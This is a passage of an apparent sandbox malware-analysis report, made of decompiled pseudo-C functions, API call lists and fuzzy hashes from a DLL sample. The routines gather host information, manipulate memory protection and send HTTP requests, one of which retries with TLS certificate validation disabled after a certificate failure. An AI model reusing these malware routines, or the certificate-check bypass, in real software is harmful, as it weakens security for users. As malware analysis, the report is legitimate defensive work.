                					_t51 = _t23;
                					if(_t51 >= 0) {
                						_t26 = _v12;
                						_t51 =  *((intOrPtr*)( *_t26 + 0x1c))(_t26,  &_v8);
                						if(_t51 >= 0) {
                							_t48 =  *0x1c1a2d8; // 0x55d5a8
                							_t30 = _v8;
                							_t12 = _t48 + 0x1c1b47c; // 0xa4c6892c
                							_t31 =  *((intOrPtr*)( *_t30))(_t30, _t12, _a4); // executed
                							_t51 = _t31;
                							_t32 = _v8;
                							 *((intOrPtr*)( *_t32 + 8))(_t32);
                						}
                						_t28 = _v12;
                						 *((intOrPtr*)( *_t28 + 8))(_t28);
                					}
                					_t24 = _v16;
                					 *((intOrPtr*)( *_t24 + 8))(_t24);
                				}
                				return _t51;
                			}

                APIs
                • IUnknown_QueryInterface_Proxy.RPCRT4(?,E7A1AF80,?), ref: 01C13355
                • IUnknown_QueryInterface_Proxy.RPCRT4(?,A4C6892C,?), ref: 01C13386
                Memory Dump Source
                • Source File: 00000001.00000002.511641891.0000000001C11000.00000020.10000000.00040000.00000000.sdmp, Offset: 01C10000, based on PE: true
                • Associated: 00000001.00000002.511610841.0000000001C10000.00000004.10000000.00040000.00000000.sdmp
                • Associated: 00000001.00000002.511683675.0000000001C19000.00000002.10000000.00040000.00000000.sdmp
                • Associated: 00000001.00000002.511708991.0000000001C1A000.00000004.10000000.00040000.00000000.sdmp
                • Associated: 00000001.00000002.511752538.0000000001C1C000.00000002.10000000.00040000.00000000.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_1_2_1c10000_loaddll32.jbxd
                Similarity
                • API ID: Interface_ProxyQueryUnknown_
                • String ID:
                • API String ID: 2522245112-0
                • Opcode ID: c5a010a2a7384cf099e7ba819261419b744e87c59b20a1c1041cdfd55ea3043f
                • Instruction ID: 91f0f65dac45171eeaee1a5c766524ef3a149a7fd1d3f2418fa010c8daab52e7
                • Opcode Fuzzy Hash: c5a010a2a7384cf099e7ba819261419b744e87c59b20a1c1041cdfd55ea3043f
                • Instruction Fuzzy Hash: 12217F75A4061AEFCB00CFA4C888D9AB779FF89714B108684E905DB325DB31EE01CF90
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                  • Part of subcall function 046C8F9E: RtlAllocateHeap.NTDLL(00000000,?,046C2180), ref: 046C8FAA
                • EnumProcessModules.PSAPI(00000008,00000000,00001000,00000000,00001000,005A95A8,00000003,00000000,00000000), ref: 046CEFBC
                • GetLastError.KERNEL32(00000008,00000000,00001000,00000000,00001000,005A95A8,00000003,00000000), ref: 046CF003
                  • Part of subcall function 046C57E0: RtlFreeHeap.NTDLL(00000000,?,046C222D,?,?,?,?,?,?,?,?,046C1089,?,?,?), ref: 046C57EC
                Memory Dump Source
                • Source File: 00000001.00000002.517566109.00000000046C0000.00000040.10000000.00040000.00000000.sdmp, Offset: 046C0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_1_2_46c0000_loaddll32.jbxd
                Similarity
                • API ID: Heap$AllocateEnumErrorFreeLastModulesProcess
                • String ID:
                • API String ID: 552344955-0
                • Opcode ID: 1040831b51932913c9687d3bc29cf371b423165022615eb4db0aea8cbe0ed539
                • Instruction ID: 8d7102c29230801e8efdea5d56cadef04b4d695b5d4eade42910db7a43b208c3
                • Opcode Fuzzy Hash: 1040831b51932913c9687d3bc29cf371b423165022615eb4db0aea8cbe0ed539
                • Instruction Fuzzy Hash: ED11A971A00208FBDB219F99C884BBEB7B9EF90799F10405DE51097340F7B5EA01DBA4
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                • GetSystemTimeAsFileTime.KERNEL32(?,00000000,00000000,046D4776,69B25F44,?,?,00000000), ref: 046C96B4
                • HeapFree.KERNEL32(00000000,00000000,00000000,00000000,?,?,00000000,046D4776), ref: 046C9715
                Memory Dump Source
                • Source File: 00000001.00000002.517566109.00000000046C0000.00000040.10000000.00040000.00000000.sdmp, Offset: 046C0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_1_2_46c0000_loaddll32.jbxd
                Similarity
                • API ID: Time$FileFreeHeapSystem
                • String ID:
                • API String ID: 892271797-0
                • Opcode ID: 1d00aa4630d274fe8f429bee22e935d2a60313ae2f83140e5569fe2776c00707
                • Instruction ID: a3b26a203b6f40a83fffc364c183ab090d64c86f0c05888cfac26cb04baaacd2
                • Opcode Fuzzy Hash: 1d00aa4630d274fe8f429bee22e935d2a60313ae2f83140e5569fe2776c00707
                • Instruction Fuzzy Hash: 7D110DB6900209EBDB01DFA1D948AAEB7FCEB08305F101469E505E7244F775AB44DF65
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                • SafeArrayCreate.OLEAUT32(00000011,00000001,80000002), ref: 01C15788
                  • Part of subcall function 01C151C7: SysFreeString.OLEAUT32(?), ref: 01C152A6
                • SafeArrayDestroy.OLEAUT32(?), ref: 01C157D5
                Memory Dump Source
                • Source File: 00000001.00000002.511641891.0000000001C11000.00000020.10000000.00040000.00000000.sdmp, Offset: 01C10000, based on PE: true
                • Associated: 00000001.00000002.511610841.0000000001C10000.00000004.10000000.00040000.00000000.sdmp
                • Associated: 00000001.00000002.511683675.0000000001C19000.00000002.10000000.00040000.00000000.sdmp
                • Associated: 00000001.00000002.511708991.0000000001C1A000.00000004.10000000.00040000.00000000.sdmp
                • Associated: 00000001.00000002.511752538.0000000001C1C000.00000002.10000000.00040000.00000000.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_1_2_1c10000_loaddll32.jbxd
                Similarity
                • API ID: ArraySafe$CreateDestroyFreeString
                • String ID:
                • API String ID: 3098518882-0
                • Opcode ID: b570c90031397ac876fb64035cc4cb63e40b08a353617f7b58483c7f74e8bd2e
                • Instruction ID: 4e5005d983863d10455a5c6fd6e6f34c6aca65e2094cdec3a2258a5dc41b0d41
                • Opcode Fuzzy Hash: b570c90031397ac876fb64035cc4cb63e40b08a353617f7b58483c7f74e8bd2e
                • Instruction Fuzzy Hash: F3118232940209FFDB11DF94C845EEEBBB8FB19310F008015FA04E6160D770DA159F91
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 100%
                			E01C171E5(intOrPtr* __edi, void* _a4, void* _a8, unsigned int _a12) {
                				void* _t24;
                				signed short _t25;
                				signed int _t27;
                				intOrPtr* _t28;
                				signed short _t29;
                
                				_t28 = __edi;
                				if(_a4 == 0) {
                					L2:
                					_t29 = E01C155E9(_a4, 0x80000002, _a8, _a12,  &_a4,  &_a12);
                					if(_t29 == 0) {
                						_t27 = _a12 >> 1;
                						if(_t27 == 0) {
                							_t29 = 2;
                							HeapFree( *0x1c1a290, 0, _a4);
                						} else {
                							_t24 = _a4;
                							 *(_t24 + _t27 * 2 - 2) =  *(_t24 + _t27 * 2 - 2) & _t29;
                							 *_t28 = _t24;
                						}
                					}
                					L6:
                					return _t29;
                				}
                				_t25 = E01C1167E(_a4, _a8, _a12, __edi); // executed
                				_t29 = _t25;
                				if(_t29 == 0) {
                					goto L6;
                				}
                				goto L2;
                			}

                APIs
                  • Part of subcall function 01C1167E: SysFreeString.OLEAUT32(00000000), ref: 01C116E4
                • HeapFree.KERNEL32(00000000,00000000,00000000,80000002,74E5F710,?,00000000,?,00000000,?,01C15D33,?,004F0053,021793E0,00000000,?), ref: 01C17246
                Strings
                Memory Dump Source
                • Source File: 00000001.00000002.511641891.0000000001C11000.00000020.10000000.00040000.00000000.sdmp, Offset: 01C10000, based on PE: true
                • Associated: 00000001.00000002.511610841.0000000001C10000.00000004.10000000.00040000.00000000.sdmp
                • Associated: 00000001.00000002.511683675.0000000001C19000.00000002.10000000.00040000.00000000.sdmp
                • Associated: 00000001.00000002.511708991.0000000001C1A000.00000004.10000000.00040000.00000000.sdmp
                • Associated: 00000001.00000002.511752538.0000000001C1C000.00000002.10000000.00040000.00000000.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_1_2_1c10000_loaddll32.jbxd
                Similarity
                • API ID: Free$HeapString
                • String ID: Ut
                • API String ID: 3806048269-8415677
                • Opcode ID: 5ed8e66018905c6df6d823115b2d13c434aa4cf780fd8e1f0a4d7f7c0b1f229c
                • Instruction ID: d893f866fd5a1337bf9fc1b31d9a8327f8055e05c23ed24312be2e8fba6098ef
                • Opcode Fuzzy Hash: 5ed8e66018905c6df6d823115b2d13c434aa4cf780fd8e1f0a4d7f7c0b1f229c
                • Instruction Fuzzy Hash: 6401E832181259FBDB229F88DC05FEA7B65FB16790F048015FE099A128C731DA61EB90
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 37%
                			E01C14A14(void* __ecx) {
                				signed int _v8;
                				void* _t15;
                				void* _t19;
                				void* _t20;
                				void* _t22;
                				intOrPtr* _t23;
                
                				_t23 = __imp__;
                				_t20 = 0;
                				_v8 = _v8 & 0;
                				 *_t23(3, 0,  &_v8, _t19, _t22, __ecx); // executed
                				_t10 = _v8;
                				if(_v8 != 0) {
                					_t20 = E01C12114(_t10 + 1);
                					if(_t20 != 0) {
                						_t15 =  *_t23(3, _t20,  &_v8); // executed
                						if(_t15 != 0) {
                							 *((char*)(_v8 + _t20)) = 0;
                						} else {
                							E01C12C11(_t20);
                							_t20 = 0;
                						}
                					}
                				}
                				return _t20;
                			}

                APIs
                • GetComputerNameExA.KERNELBASE(00000003,00000000,?,?,00000000,?,?,01C17553), ref: 01C14A2C
                  • Part of subcall function 01C12114: RtlAllocateHeap.NTDLL(00000000,00000000,01C16F72), ref: 01C12120
                • GetComputerNameExA.KERNELBASE(00000003,00000000,?,?,?,?,01C17553), ref: 01C14A49
                  • Part of subcall function 01C12C11: RtlFreeHeap.NTDLL(00000000,00000000,01C17013,00000000,?,?,00000000), ref: 01C12C1D
                Memory Dump Source
                • Source File: 00000001.00000002.511641891.0000000001C11000.00000020.10000000.00040000.00000000.sdmp, Offset: 01C10000, based on PE: true
                • Associated: 00000001.00000002.511610841.0000000001C10000.00000004.10000000.00040000.00000000.sdmp
                • Associated: 00000001.00000002.511683675.0000000001C19000.00000002.10000000.00040000.00000000.sdmp
                • Associated: 00000001.00000002.511708991.0000000001C1A000.00000004.10000000.00040000.00000000.sdmp
                • Associated: 00000001.00000002.511752538.0000000001C1C000.00000002.10000000.00040000.00000000.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_1_2_1c10000_loaddll32.jbxd
                Similarity
                • API ID: ComputerHeapName$AllocateFree
                • String ID:
                • API String ID: 187446995-0
                • Opcode ID: 3ae2dd8408a78e85615925576fa5b8a9a074e3f5bd44b89535d636b0f785ca7a
                • Instruction ID: b9b57f4ec21eeb55a704811df71cf7e0851e9805df745b9b6ec18ac60030f460
                • Opcode Fuzzy Hash: 3ae2dd8408a78e85615925576fa5b8a9a074e3f5bd44b89535d636b0f785ca7a
                • Instruction Fuzzy Hash: 93F03077684109FAEB11D6AA9D01EAB66BCDBC7A50F210055AA05D7144EA70DB02A770
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 100%
                			E01C15E26(WCHAR* _a4) {
                				void* __edi;
                				intOrPtr _t11;
                				intOrPtr _t14;
                				void* _t16;
                				void* _t18;
                				WCHAR* _t20;
                
                				_t20 = E01C12114(lstrlenW(_a4) + _t7 + 0x5c);
                				if(_t20 == 0) {
                					_t18 = 8;
                				} else {
                					_t11 =  *0x1c1a2d8; // 0x55d5a8
                					_t5 = _t11 + 0x1c1ba50; // 0x43002f
                					wsprintfW(_t20, _t5, 5, _a4);
                					_t14 =  *0x1c1a2d8; // 0x55d5a8
                					_t6 = _t14 + 0x1c1b8fc; // 0x6d0063
                					_t16 = E01C16096(0, _t6, _t20, 0); // executed
                					_t18 = _t16;
                					E01C12C11(_t20);
                				}
                				return _t18;
                			}

                APIs
                • lstrlenW.KERNEL32(74E5F710,00000000,?,01C161EA,00000000,?,74E5F710,00000000,74E5F730), ref: 01C15E2C
                  • Part of subcall function 01C12114: RtlAllocateHeap.NTDLL(00000000,00000000,01C16F72), ref: 01C12120
                • wsprintfW.USER32 ref: 01C15E55
                  • Part of subcall function 01C16096: memset.NTDLL ref: 01C160B9
                  • Part of subcall function 01C16096: GetLastError.KERNEL32 ref: 01C16105
                  • Part of subcall function 01C12C11: RtlFreeHeap.NTDLL(00000000,00000000,01C17013,00000000,?,?,00000000), ref: 01C12C1D
                Memory Dump Source
                • Source File: 00000001.00000002.511641891.0000000001C11000.00000020.10000000.00040000.00000000.sdmp, Offset: 01C10000, based on PE: true
                • Associated: 00000001.00000002.511610841.0000000001C10000.00000004.10000000.00040000.00000000.sdmp
                • Associated: 00000001.00000002.511683675.0000000001C19000.00000002.10000000.00040000.00000000.sdmp
                • Associated: 00000001.00000002.511708991.0000000001C1A000.00000004.10000000.00040000.00000000.sdmp
                • Associated: 00000001.00000002.511752538.0000000001C1C000.00000002.10000000.00040000.00000000.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_1_2_1c10000_loaddll32.jbxd
                Similarity
                • API ID: Heap$AllocateErrorFreeLastlstrlenmemsetwsprintf
                • String ID:
                • API String ID: 1672627171-0
                • Opcode ID: 1941e3186ac45aa789d59bbfe626f5c1a89a5be72b60207af14b5e256adda2d1
                • Instruction ID: 81c2de0389d64d3e9f6927a13e00c8c103d17b9e24d21b6842bbcb107bc70f00
                • Opcode Fuzzy Hash: 1941e3186ac45aa789d59bbfe626f5c1a89a5be72b60207af14b5e256adda2d1
                • Instruction Fuzzy Hash: 33F09032981225EFD6219BA99C48F9B37ADEF97610F058011FA09C7119CA74D905EB61
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                • RtlEnterCriticalSection.NTDLL(046EE480), ref: 046D8E68
                • RtlLeaveCriticalSection.NTDLL(046EE480), ref: 046D8EA4
                  • Part of subcall function 046E0B4D: lstrlen.KERNEL32(?,?,00000000,?,046CB5BA,046ED4E4,046C159F,046C158F,00000004,00000000,?,00000000,046E48E6,046DCCD7,046C159F,046C158F), ref: 046E0B9A
                  • Part of subcall function 046E0B4D: VirtualProtect.KERNELBASE(00000000,00000000,00000040,-0000001C,?,00000000,?,046CB5BA,046ED4E4,046C159F,046C158F,00000004,00000000,?,00000000,046E48E6), ref: 046E0BAC
                  • Part of subcall function 046E0B4D: lstrcpy.KERNEL32(00000000,?), ref: 046E0BBB
                  • Part of subcall function 046E0B4D: VirtualProtect.KERNELBASE(00000000,00000000,?,-0000001C,?,00000000,?,046CB5BA,046ED4E4,046C159F,046C158F,00000004,00000000,?,00000000,046E48E6), ref: 046E0BCC
                  • Part of subcall function 046C57E0: RtlFreeHeap.NTDLL(00000000,?,046C222D,?,?,?,?,?,?,?,?,046C1089,?,?,?), ref: 046C57EC
                Memory Dump Source
                • Source File: 00000001.00000002.517566109.00000000046C0000.00000040.10000000.00040000.00000000.sdmp, Offset: 046C0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_1_2_46c0000_loaddll32.jbxd
                Similarity
                • API ID: CriticalProtectSectionVirtual$EnterFreeHeapLeavelstrcpylstrlen
                • String ID:
                • API String ID: 1872894792-0
                • Opcode ID: 102cbe6717c43268a41686ab5f2680d995603e7185d3a30bb4a79f7b995b8186
                • Instruction ID: 39ecc524c679bd4c21f3b668753d1b2813900f0b9e438620efe2df463bc9890f
                • Opcode Fuzzy Hash: 102cbe6717c43268a41686ab5f2680d995603e7185d3a30bb4a79f7b995b8186
                • Instruction Fuzzy Hash: DDF0E576602325DFA7207F6AD888876F7E8EB99218305414EE95557301FBB37C018AE0
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 100%
                			E01C16D32(signed int __edx, void* __edi, intOrPtr _a4) {
                				void* _t3;
                				void* _t5;
                				void* _t8;
                				void* _t9;
                				void* _t10;
                				signed int _t11;
                
                				_t11 = __edx;
                				_t3 = HeapCreate(0, 0x400000, 0); // executed
                				 *0x1c1a290 = _t3;
                				if(_t3 == 0) {
                					_t9 = 8;
                					return _t9;
                				}
                				 *0x1c1a180 = GetTickCount();
                				_t5 = E01C1500B(_a4);
                				if(_t5 == 0) {
                					E01C12F14(_t10, __edi, _a4); // executed
                					if(E01C117FF(_t10) != 0) {
                						 *0x1c1a2b8 = 1; // executed
                					}
                					_t8 = E01C134A2(_t11); // executed
                					return _t8;
                				}
                				return _t5;
                			}

                APIs
                • HeapCreate.KERNELBASE(00000000,00400000,00000000,01C11B56,?), ref: 01C16D3B
                • GetTickCount.KERNEL32 ref: 01C16D4F
                Memory Dump Source
                • Source File: 00000001.00000002.511641891.0000000001C11000.00000020.10000000.00040000.00000000.sdmp, Offset: 01C10000, based on PE: true
                • Associated: 00000001.00000002.511610841.0000000001C10000.00000004.10000000.00040000.00000000.sdmp
                • Associated: 00000001.00000002.511683675.0000000001C19000.00000002.10000000.00040000.00000000.sdmp
                • Associated: 00000001.00000002.511708991.0000000001C1A000.00000004.10000000.00040000.00000000.sdmp
                • Associated: 00000001.00000002.511752538.0000000001C1C000.00000002.10000000.00040000.00000000.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_1_2_1c10000_loaddll32.jbxd
                Similarity
                • API ID: CountCreateHeapTick
                • String ID:
                • API String ID: 2177101570-0
                • Opcode ID: 9cd8db12e093e7ecb3593c0dd707b27d3baf2de8d3e97f09ae5e37c00d7fdedf
                • Instruction ID: b8043c29b05e3631593b129cc5be5870d1e6bec9aaba90fd02d3868554690c8e
                • Opcode Fuzzy Hash: 9cd8db12e093e7ecb3593c0dd707b27d3baf2de8d3e97f09ae5e37c00d7fdedf
                • Instruction Fuzzy Hash: A8E092302C4322EAE7317FB4AC097093AA47F77B44F504424E50BD629CDBB0C050B762
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                  • Part of subcall function 046D4428: VirtualAlloc.KERNELBASE(00000000,?,00003000,00000004), ref: 046D4461
                  • Part of subcall function 046D4428: VirtualFree.KERNEL32(00000000,00000000,00008000,00000000,00000000,?,?), ref: 046D4497
                  • Part of subcall function 046D4428: VirtualAlloc.KERNEL32(00000000,?,00003000,00000004), ref: 046D44A3
                  • Part of subcall function 046D4428: lstrcmpi.KERNEL32(?,00000000), ref: 046D44E0
                  • Part of subcall function 046D4428: StrChrA.SHLWAPI(?,0000002E), ref: 046D44E9
                  • Part of subcall function 046D4428: lstrcmpi.KERNEL32(?,00000000), ref: 046D44FB
                  • Part of subcall function 046D4428: VirtualFree.KERNELBASE(00000000,00000000,00008000), ref: 046D454C
                • VirtualAlloc.KERNELBASE(00000000,?,00003000,00000004,00000010,?,?,?,046EA5C0,0000002C,046C5FC8,04C98E36,?,00000000,046C3B4C), ref: 046C9566
                  • Part of subcall function 046CB45A: GetProcAddress.KERNEL32(?,00000000), ref: 046CB483
                  • Part of subcall function 046CB45A: NtWow64ReadVirtualMemory64.NTDLL(00000100,?,?,00000028,00000000,00000000,00000100,00000000,?,?,?,046CE55E,00000000,00000000,00000028,00000100), ref: 046CB4A5
                • VirtualFree.KERNELBASE(?,00000000,00008000,00000010,?,?,?,046EA5C0,0000002C,046C5FC8,04C98E36,?,00000000,046C3B4C,?,00000318), ref: 046C95F1
                Memory Dump Source
                • Source File: 00000001.00000002.517566109.00000000046C0000.00000040.10000000.00040000.00000000.sdmp, Offset: 046C0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_1_2_46c0000_loaddll32.jbxd
                Similarity
                • API ID: Virtual$AllocFree$lstrcmpi$AddressMemory64ProcReadWow64
                • String ID:
                • API String ID: 4138075514-0
                • Opcode ID: 1eea16ce89d63e8ac09a93a9853927ff6e47f3cdb9ffa3c497d7b358ddb9050c
                • Instruction ID: 7471e7397bb3bf9e0d27dd862bac8d0713a8e5413bec8c9cdcf6f860165e27f1
                • Opcode Fuzzy Hash: 1eea16ce89d63e8ac09a93a9853927ff6e47f3cdb9ffa3c497d7b358ddb9050c
                • Instruction Fuzzy Hash: 5821E671D01229ABCF519FA5DC849EEBFB4FF08714F10812AE914B6250E3356A45CFA4
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 32%
                			E01C14EFA(intOrPtr _a4, signed int _a8) {
                				long _v8;
                				long _v12;
                				char _v16;
                				void* _t14;
                				long _t15;
                				char* _t17;
                				intOrPtr* _t19;
                				signed int _t22;
                
                				_t19 = __imp__; // 0x6f99e700
                				// NEG + SBB esi,esi: header length becomes -1 (null-terminated) when _a8 is non-NULL, else 0
                				_t22 =  ~_a8;
                				_v12 = 0; // set once the security flags have been relaxed, so it is only done one time
                				asm("sbb esi, esi");
                				while(1) {
                					_v8 = 0;
                					// seven-argument import call; the argument shape matches WinHttpSendRequest(hRequest, headers, headersLen, optional, optionalLen, totalLen, context)
                					_t14 =  *_t19(_a4, _a8, _t22, 0, 0, 0, 0); // executed
                					if(_t14 != 0) {
                						break;
                					}
                					_t15 = GetLastError();
                					_v8 = _t15;
                					if(_t15 != 0x2f8f) { // 0x2f8f == 12175 == ERROR_WINHTTP_SECURE_FAILURE
                						if(_t15 == 0x2f00) { // 0x2f00 == 12032 == ERROR_WINHTTP_RESEND_REQUEST: retry as-is
                							continue;
                						}
                					} else {
                						// 0x3300 == SECURITY_FLAG_IGNORE_UNKNOWN_CA | SECURITY_FLAG_IGNORE_CERT_WRONG_USAGE |
                						//           SECURITY_FLAG_IGNORE_CERT_CN_INVALID | SECURITY_FLAG_IGNORE_CERT_DATE_INVALID
                						_v16 = 0x3300;
                						if(_v12 == 0) {
                							_t17 =  &_v16;
                							// option 0x1f == 31 == WINHTTP_OPTION_SECURITY_FLAGS, 4-byte DWORD buffer (WinHttpSetOption-shaped call);
                							// on a TLS certificate failure the request is retried with certificate validation disabled
                							__imp__(_a4, 0x1f, _t17, 4);
                							if(_t17 == 0) { // decompiler reuses _t17 for the call's return value here
                								_v8 = GetLastError();
                							} else {
                								_v12 = 1;
                								continue;
                							}
                						}
                					}
                					L9:
                					return _v8; // 0 on success, otherwise the last Win32 error code
                				}
                				goto L9;
                			}

                APIs
                • GetLastError.KERNEL32 ref: 01C14F17
                • GetLastError.KERNEL32(?,?,?,?,?,?,?,01C176DB,00000000,?,?), ref: 01C14F6E
                Memory Dump Source
                • Source File: 00000001.00000002.511641891.0000000001C11000.00000020.10000000.00040000.00000000.sdmp, Offset: 01C10000, based on PE: true
                • Associated: 00000001.00000002.511610841.0000000001C10000.00000004.10000000.00040000.00000000.sdmp
                • Associated: 00000001.00000002.511683675.0000000001C19000.00000002.10000000.00040000.00000000.sdmp
                • Associated: 00000001.00000002.511708991.0000000001C1A000.00000004.10000000.00040000.00000000.sdmp
                • Associated: 00000001.00000002.511752538.0000000001C1C000.00000002.10000000.00040000.00000000.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_1_2_1c10000_loaddll32.jbxd
                Similarity
                • API ID: ErrorLast
                • String ID:
                • API String ID: 1452528299-0
                • Opcode ID: acfb3612fb9d0ae0eabb46b42b41ec34641f78f356ee3b39e17eccfcd88855dd
                • Instruction ID: a18b1c3a369b33da0958a6fa1877323e5d2b21e047ac3f12c1297dcfdd91de5c
                • Opcode Fuzzy Hash: acfb3612fb9d0ae0eabb46b42b41ec34641f78f356ee3b39e17eccfcd88855dd
                • Instruction Fuzzy Hash: 04018431D40208FBDF249F9AD84CA9EBFB8EB8A710F108026F505D6248C770D744EB61
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                • GetModuleHandleA.KERNEL32(?,00000000,?,00000000,046E48E6,046DCCD7,046C159F,046C158F,00000000,0000000B,?,046C158F,046C158F,00000001,?,00000000), ref: 046CB4CA
                Memory Dump Source
                • Source File: 00000001.00000002.517566109.00000000046C0000.00000040.10000000.00040000.00000000.sdmp, Offset: 046C0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_1_2_46c0000_loaddll32.jbxd
                Similarity
                • API ID: HandleModule
                • String ID:
                • API String ID: 4139908857-0
                • Opcode ID: 145af1fd92c6d8b508e4ef4784a66fc6c28ddb02dbc4ae960fc4ba3626b11187
                • Instruction ID: bd0730e8537bdffb66f40c4f3675dbe91622f0e0d012b8d48cab3059dea8873f
                • Opcode Fuzzy Hash: 145af1fd92c6d8b508e4ef4784a66fc6c28ddb02dbc4ae960fc4ba3626b11187
                • Instruction Fuzzy Hash: F0316AB1A00215EFDB10DF8AE8869BDB7F4FB14714B9580AEE204AB204E331BD41CB91
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 92%
                			E01C1134A(signed int __eax, void* __ecx, intOrPtr* _a4, void** _a8, intOrPtr* _a12) {
                				signed int _v5;
                				signed int _v12;
                				void* _t32;
                				signed int _t37;
                				signed int _t39;
                				signed char _t45;
                				void* _t49;
                				char* _t51;
                				signed int _t65;
                				signed int _t66;
                				signed int _t69;
                
                				// Converts __eax bytes at _a4 into a comma-separated decimal ASCII string ("12,200,7");
                				// the buffer is returned through _a8 and its length through _a12.
                				_v12 = _v12 & 0x00000000;
                				_t69 = __eax;
                				// worst case per input byte: three digits plus a comma, hence 4 * count
                				_t32 = RtlAllocateHeap( *0x1c1a290, 0, __eax << 2); // executed
                				_t49 = _t32;
                				if(_t49 == 0) {
                					_v12 = 8; // allocation failure
                				} else {
                					 *_a8 = _t49;
                					do {
                						_t45 =  *_a4;
                						asm("cdq");
                						_t65 = 0x64; // 100
                						_t37 = (_t45 & 0x000000ff) / _t65; // hundreds digit
                						_v5 = _t37;
                						if(_t37 != 0) {
                							 *_t49 = _t37 + 0x30; // + '0'
                							_t49 = _t49 + 1;
                							_t45 = _t45 + _t37 * 0x9c; // 0x9c == -100 mod 256: strip the hundreds
                						}
                						asm("cdq");
                						_t66 = 0xa; // 10
                						_t39 = (_t45 & 0x000000ff) / _t66; // tens digit
                						if(_t39 != 0 || _v5 != _t39) { // emit tens digit if non-zero, or if a hundreds digit was written
                							 *_t49 = _t39 + 0x30;
                							_t49 = _t49 + 1;
                							_t45 = _t45 + _t39 * 0xf6; // 0xf6 == -10 mod 256: strip the tens
                						}
                						_a4 = _a4 + 1;
                						 *_t49 = _t45 + 0x30; // units digit
                						 *(_t49 + 1) = 0x2c; // ','
                						_t49 = _t49 + 2;
                						_t69 = _t69 - 1;
                					} while (_t69 != 0);
                					_t51 = _t49 - 1;
                					 *_a12 = _t51 -  *_a8; // length without the trailing comma
                					 *_t51 = 0; // overwrite the trailing comma with the terminator
                				}
                				return _v12;
                			}


                APIs
                • RtlAllocateHeap.NTDLL(00000000,00000000,?), ref: 01C11362
                Memory Dump Source
                • Source File: 00000001.00000002.511641891.0000000001C11000.00000020.10000000.00040000.00000000.sdmp, Offset: 01C10000, based on PE: true
                • Associated: 00000001.00000002.511610841.0000000001C10000.00000004.10000000.00040000.00000000.sdmp
                • Associated: 00000001.00000002.511683675.0000000001C19000.00000002.10000000.00040000.00000000.sdmp
                • Associated: 00000001.00000002.511708991.0000000001C1A000.00000004.10000000.00040000.00000000.sdmp
                • Associated: 00000001.00000002.511752538.0000000001C1C000.00000002.10000000.00040000.00000000.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_1_2_1c10000_loaddll32.jbxd
                Similarity
                • API ID: AllocateHeap
                • String ID:
                • API String ID: 1279760036-0
                • Opcode ID: 48474916b2d78d5fb7336dd555cccbb24ed4bfef8c4bdc90f8dbf000ceb89aa9
                • Instruction ID: 786af47e924cf61f97a6cd59d9ec0ecae4c3ab7ba99ab6d32651837d90351f62
                • Opcode Fuzzy Hash: 48474916b2d78d5fb7336dd555cccbb24ed4bfef8c4bdc90f8dbf000ceb89aa9
                • Instruction Fuzzy Hash: 1411E431286344DFEB168F2DC451BED7BA5EB67758F58408AE5409B296C27BC60BC720
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                • GetModuleHandleA.KERNEL32(?,00000003,046ED514,00000000,005A95A8,?,046CB526,00000004,00000000,?,00000000,046E48E6,046DCCD7,046C159F,046C158F), ref: 046CB722
                  • Part of subcall function 046DD6E3: NtQueryInformationProcess.NTDLL(00000000,?,00000018,00000000,046EE480), ref: 046DD6FA
                Memory Dump Source
                • Source File: 00000001.00000002.517566109.00000000046C0000.00000040.10000000.00040000.00000000.sdmp, Offset: 046C0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_1_2_46c0000_loaddll32.jbxd
                Similarity
                • API ID: HandleInformationModuleProcessQuery
                • String ID:
                • API String ID: 2776635927-0
                • Opcode ID: 52787008b7387df6362134d8d454b756b59bb1a19ce0cc72a921ec05567ead9d
                • Instruction ID: 24057c4a9668a708fc1bf52b3d5ee21d67e1a58a804c20e87ddb8db1f8783343
                • Opcode Fuzzy Hash: 52787008b7387df6362134d8d454b756b59bb1a19ce0cc72a921ec05567ead9d
                • Instruction Fuzzy Hash: 59219075A40205AFDB20DF99E88297A77E9EF64BA4724442EEC45DB310F672F900CB70
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 046C385D
                Memory Dump Source
                • Source File: 00000001.00000002.517566109.00000000046C0000.00000040.10000000.00040000.00000000.sdmp, Offset: 046C0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_1_2_46c0000_loaddll32.jbxd
                Similarity
                • API ID: CreateProcess
                • String ID:
                • API String ID: 963392458-0
                • Opcode ID: b75f49ae64518d929c0dff5f31ca5824d44965c90eede299fca69bc718764e6f
                • Instruction ID: 36d7898bd2277ebad357e427ea731cddabf8b140084f6703287ed6484e1cf0c6
                • Opcode Fuzzy Hash: b75f49ae64518d929c0dff5f31ca5824d44965c90eede299fca69bc718764e6f
                • Instruction Fuzzy Hash: 80111E32201209AFDF018FA9DC409EA7BA9FF59374B058129FD1996260D736ED21DB94
